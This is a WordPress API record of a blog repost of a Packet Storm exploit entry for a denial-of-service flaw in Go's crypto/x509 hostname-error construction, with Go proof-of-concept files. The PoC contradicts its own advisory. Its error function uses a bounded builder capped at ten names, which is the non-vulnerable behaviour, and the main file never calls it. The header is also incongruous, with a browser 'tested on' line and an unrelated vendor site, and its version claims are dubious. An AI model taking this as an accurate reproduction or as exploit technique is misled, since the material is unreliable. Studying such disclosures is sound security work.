{"id":39204,"date":"2026-02-05T05:39:41","date_gmt":"2026-02-05T05:39:41","guid":{"rendered":"http:\/\/localhost\/?p=39204"},"modified":"2026-02-05T05:39:41","modified_gmt":"2026-02-05T05:39:41","slug":"go-cryptox509-hostname-verification-denial-of-service","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=39204","title":{"rendered":"\ud83d\udcc4 Go crypto\/x509 Hostname Verification Denial of Service_PACKETSTORM:214882"},"content":{"rendered":"

{“lastseen”:”2026-02-04T16:01:59″,”description”:”A denial of service vulnerability exists in the Go programming language crypto\/x509 package. The issue occurs during TLS hostname verification when constructing error messages for certificates containing a very large number of DNS names. In affected…”,”published”:”2026-02-04T00:00:00″,”modified”:”2026-02-04T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 Go crypto\/x509 Hostname Verification Denial of Service”,”source”:””,”references”:””,”id”:”PACKETSTORM:214882″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2025-61279″,”CVE-2025-61729″],”sourceData”:”=============================================================================================================================================\\n | # Title : Go crypto\/x509 Hostname Verification Denial of Service |\\n | # Author : indoushka |\\n | # Tested on : windows 11 Fr(Pro) \/ browser : Mozilla firefox 147.0.1 (64 bits) |\\n | # Vendor : https:\/\/www.gocrypto.com\/ |\\n =============================================================================================================================================\\n \\n [+] References : https:\/\/packetstorm.news\/files\/id\/214685\/ \\u0026 CVE-2025-61729\\n \\n [+] Summary : A denial of service vulnerability exists in the Go programming language crypto\/x509 package. The issue occurs during TLS hostname verification\\n when constructing error messages for certificates containing a very large number of DNS names.\\n In affected versions, error message construction uses repeated string concatenation without bounds, resulting in quadratic time complexity\\n (O(n\u00b2)). An attacker can exploit this by presenting a malicious TLS certificate containing an excessive number of DNSNames, causing severe CPU and memory exhaustion.\\n \\t\\t\\t\\t \\n [+] Affected Versions : All Go versions prior to the official fixes are affected.\\n \\n The following versions are NOT vulnerable:\\n \\n – Go 1.23.1\\n – Go 1.22.10\\n – Any Go release containing the official patch\\n \\n [+] Technical Details : When hostname verification fails, the crypto\/x509 package constructs a human-readable error string listing all DNS names present in the TLS certificate.\\n \\n [+] In vulnerable versions:\\n \\n – No upper bound is enforced on the number of DNS names processed\\n – String concatenation is performed using repeated \\”+=\\” operations\\n – This leads to quadratic time complexity and excessive memory usage\\n \\n An attacker-controlled certificate with tens or hundreds of thousandsof DNS names can trigger resource exhaustion during error generation.\\n \\n \\n [+] PoC : The following PoC demonstrates the vulnerable condition by creating a certificate-like structure with 100,000 DNS names and triggering the\\n error handling logic. The Error() method is intentionally not invoked to prevent system freeze on vulnerable environments.\\n \\n File: hostname_error.go\\n ———————–\\n package main\\n \\n import (\\n \\”fmt\\”\\n \\”strings\\”\\n )\\n \\n type HostnameError struct {\\n Certificate *Certificate\\n Host string\\n }\\n \\n type Certificate struct {\\n DNSNames []string\\n }\\n \\n func (h HostnameError) Error() string {\\n const maxNames = 10\\n \\n var builder strings.Builder\\n names := h.Certificate.DNSNames\\n \\n builder.WriteString(\\”certificate is valid for \\”)\\n \\n displayCount := len(names)\\n if displayCount \\u003e maxNames {\\n displayCount = maxNames\\n }\\n \\n for i := 0; i \\u003c displayCount; i++ {\\n if i \\u003e 0 {\\n builder.WriteString(\\”, \\”)\\n }\\n builder.WriteString(names[i])\\n }\\n \\n if len(names) \\u003e maxNames {\\n builder.WriteString(\\n fmt.Sprintf(\\”, and %d more\\”, len(names)-maxNames),\\n )\\n }\\n \\n builder.WriteString(fmt.Sprintf(\\”, not for %s\\”, h.Host))\\n return builder.String()\\n }\\n ————-\\n File: poc.go\\n ————-\\n package main\\n \\n import \\”fmt\\”\\n \\n func main() {\\n cert := \\u0026Certificate{\\n DNSNames: make([]string, 100000),\\n }\\n \\n for i := range cert.DNSNames {\\n cert.DNSNames[i] = fmt.Sprintf(\\”host%d.example.com\\”, i)\\n }\\n \\n err := HostnameError{\\n Certificate: cert,\\n Host: \\”example.com\\”,\\n }\\n \\n fmt.Println(\\”[+] HostnameError object created\\”)\\n fmt.Printf(\\”[+] DNSNames count: %d\\\\n\\”, len(cert.DNSNames))\\n \\n \/\/ WARNING:\\n \/\/ Calling err.Error() on a vulnerable Go version\\n \/\/ may cause severe CPU and memory exhaustion.\\n _ = err\\n }\\n \\n [+] How to Run\\n \\n 1. Save the files as:\\n – hostname_error.go\\n – poc.go\\n \\n 2. Run the PoC:\\n $ go run .\\n \\n Greetings to :============================================================\\n jericho * Larry W. Cashdollar * r00t * Malvuln (John Page aka hyp3rlinx)*|\\n ==========================================================================”,”sourceHref”:”https:\/\/packetstorm.news\/download\/214882″,”cvss”:{“score”:7.5,”severity”:”HIGH”,”vector”:”CVSS:3.1\/AV:N\/AC:L\/PR:N\/UI:N\/S:U\/C:N\/I:N\/A:H”,”version”:”3.1″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/packetstorm.news\/files\/id\/214882\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"

{“lastseen”:”2026-02-04T16:01:59″,”description”:”A denial of service vulnerability exists in the Go programming language crypto\/x509 package. The issue occurs during TLS hostname verification when constructing error messages for…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,16,12,15,13,53,7,11,5],"class_list":["post-39204","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-cvss-75","tag-exploit","tag-high","tag-news","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n\ud83d\udcc4 Go crypto\/x509 Hostname Verification Denial of Service_PACKETSTORM:214882 - zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=39204\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"\ud83d\udcc4 Go crypto\/x509 Hostname Verification Denial of Service_PACKETSTORM:214882 - zero redgem\" \/>\n<meta property=\"og:description\" content=\"{“lastseen”:”2026-02-04T16:01:59″,”description”:”A denial of service vulnerability exists in the Go programming language crypto\/x509 package. The issue occurs during TLS hostname verification when constructing error messages for...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=39204\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2026-02-05T05:39:41+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"4 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=39204#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=39204\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"\ud83d\udcc4 Go crypto\\\/x509 Hostname Verification Denial of Service_PACKETSTORM:214882\",\"datePublished\":\"2026-02-05T05:39:41+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=39204\"},\"wordCount\":749,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CVE\",\"CVSS\",\"CVSS-7.5\",\"exploit\",\"HIGH\",\"news\",\"packetstorm\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=39204#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=39204\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=39204\",\"name\":\"\ud83d\udcc4 Go crypto\\\/x509 Hostname Verification Denial of Service_PACKETSTORM:214882 - zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2026-02-05T05:39:41+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=39204#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=39204\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=39204#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"\ud83d\udcc4 Go crypto\\\/x509 Hostname Verification Denial of Service_PACKETSTORM:214882\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"\ud83d\udcc4 Go crypto\/x509 Hostname Verification Denial of Service_PACKETSTORM:214882 - zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=39204","og_locale":"en_US","og_type":"article","og_title":"\ud83d\udcc4 Go crypto\/x509 Hostname Verification Denial of Service_PACKETSTORM:214882 - zero redgem","og_description":"{“lastseen”:”2026-02-04T16:01:59″,”description”:”A denial of service vulnerability exists in the Go programming language crypto\/x509 package. The issue occurs during TLS hostname verification when constructing error messages for...","og_url":"https:\/\/zero.redgem.net\/?p=39204","og_site_name":"zero redgem","article_published_time":"2026-02-05T05:39:41+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"4 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=39204#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=39204"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"\ud83d\udcc4 Go crypto\/x509 Hostname Verification Denial of Service_PACKETSTORM:214882","datePublished":"2026-02-05T05:39:41+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=39204"},"wordCount":749,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CVE","CVSS","CVSS-7.5","exploit","HIGH","news","packetstorm","Security","tapic","Vulnerability"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=39204#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=39204","url":"https:\/\/zero.redgem.net\/?p=39204","name":"\ud83d\udcc4 Go crypto\/x509 Hostname Verification Denial of Service_PACKETSTORM:214882 - zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2026-02-05T05:39:41+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=39204#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=39204"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=39204#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"\ud83d\udcc4 Go crypto\/x509 Hostname Verification Denial of Service_PACKETSTORM:214882"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/39204","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=39204"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/39204\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=39204"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=39204"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=39204"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}